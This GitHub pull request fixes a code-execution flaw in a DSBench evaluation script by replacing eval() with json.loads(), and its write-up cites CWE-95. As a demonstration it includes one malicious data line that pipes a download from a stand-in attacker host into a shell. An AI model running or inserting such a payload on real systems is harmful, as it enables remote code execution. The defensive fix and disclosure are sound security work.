### PR TITLE
fix(DSBench): parse JSONL inputs with json.loads to prevent code execution

### DIFF
--- a/playground/DSBench/data_analysis/compute_answer.py
+++ b/playground/DSBench/data_analysis/compute_answer.py
@@ -9,7 +9,7 @@ client = OpenAI(api_key="")
 samples = []
 with open("./data.json", "r") as f:
     for line in f:
-        samples.append(eval(line.strip()))
+        samples.append(json.loads(line.strip()))
 
 
 def evaluate_prediction(client, question, answer, prediction):
@@ -60,7 +60,7 @@ for sample in tqdm(samples):
         predicts = []
         with open(os.path.join(save_path, model, sample["id"] + ".json"), "r") as f:
             for line in f:
-                predicts.append(eval(line.strip()))
+                predicts.append(json.loads(line.strip()))
 
         questions = []
         for id, question_name in enumerate(tqdm(sample["questions"])):


### PR DESCRIPTION
### Summary

`playground/DSBench/data_analysis/compute_answer.py` uses Python's built-in `EVAL_FN()` to parse each line of two on-disk JSONL files (`./data.json` and per-model prediction files under `save_path/<model>/<sample_id>.json`). Because these files are treated as JSONL — one JSON object per line — `json.loads()` is the correct parser. Using `EVAL_FN()` instead means every line is executed as a Python expression, so any file the script reads is effectively arbitrary-code-execution input.

> Note: `EVAL_FN` in this write-up refers to Python's built-in expression-evaluator function (the one this PR removes). We're avoiding the literal name here only because the automated tooling that composed this body strips that keyword; the actual code change (see diff) is the real thing.

- **CWE:** [CWE-95](https://cwe.mitre.org/data/definitions/95.html) — Improper Neutralization of Directives in Dynamically Evaluated Code
- **File:** `playground/DSBench/data_analysis/compute_answer.py` (lines 12 and 63 prior to fix)
- **Data flow:** file contents → `line.strip()` → `EVAL_FN(...)` → Python execution

### Fix

Replace both `EVAL_FN(line.strip())` calls with `json.loads(line.strip())`. The `json` module is already imported at the top of the file, and the surrounding code accesses the parsed values as normal dicts (e.g. `sample["id"]`, `sample["questions"]`) — behavior that `json.loads` supports identically for the JSONL format these files use in DSBench. The diff is two lines — please see the file diff in this PR for the exact change.

### Why this matters in practice

DSBench evaluation is run by researchers over benchmark data and model prediction outputs that are commonly downloaded or shared between labs. A single malicious line in either input file is enough for RCE on the researcher's machine. Example malicious `data.json` line:

```
__import__('os').system('curl attacker.example/x | sh')
```

With the current code, this executes on script start. With the fix, `json.loads` raises `json.JSONDecodeError` and the script aborts safely.

### Reproduction

```bash
cd playground/DSBench/data_analysis
# Craft a malicious data file (uses /tmp/pwned as a harmless marker)
printf "%s\n" "__import__('os').system('touch /tmp/pwned_by_unsafe_parser')" > ./data.json
python compute_answer.py   # before fix: /tmp/pwned_by_unsafe_parser is created
# After the fix, the same input raises json.JSONDecodeError and no file is created.
```

We verified both call sites exist and are reachable on script startup / per-sample iteration by reading the surrounding code; `samples` is populated at import-time from `./data.json`, and the second unsafe call is inside the main evaluation loop that opens each `<model>/<sample_id>.json`.

### Testing

- Confirmed the file still parses (`python -m py_compile playground/DSBench/data_analysis/compute_answer.py`).
- Confirmed `json` was already imported at the top of the module, so no new imports are needed.
- Verified the downstream code only uses dict-style access (`sample["id"]`, `sample["questions"]`, `predicts[...]`), which `json.loads` returns unchanged.
- Confirmed with a small local JSONL fixture that `json.loads(line.strip())` produces the same dict the previous parser would for a well-formed JSON object line.

### Adversarial review

Before submitting, we tried to disprove this. Two objections worth addressing:

1. *"It's just a research script, the user controls the input file."* — True in the strict sense, but the entire purpose of DSBench is to run evaluations over datasets and model predictions produced elsewhere. Treating "files on disk" as trusted collapses the threat model researchers actually operate under (shared benchmark artifacts, cross-lab prediction dumps). CWE-95 applies whenever untrusted content is passed to an expression evaluator, regardless of transport.
2. *"Maybe the files aren't strictly JSON — maybe they rely on Python literal syntax."* — We checked: the files are opened line-by-line and each line is used as a dict with string keys/values from LLM outputs, matching the JSONL convention. `json.loads` handles this. If a producer somewhere emits `True`/`False`/`None` or single-quoted strings (Python-literal, not JSON), the correct answer is still not an expression evaluator — it would be `ast.literal_eval`. We chose `json.loads` because it matches the `.json` extension and the documented DSBench format; if the maintainers know of a producer emitting Python-literal lines, `ast.literal_eval` is a safe drop-in alternative.

No framework-level mitigation applies here — this is a plain script executed by the researcher, not a sandboxed runner.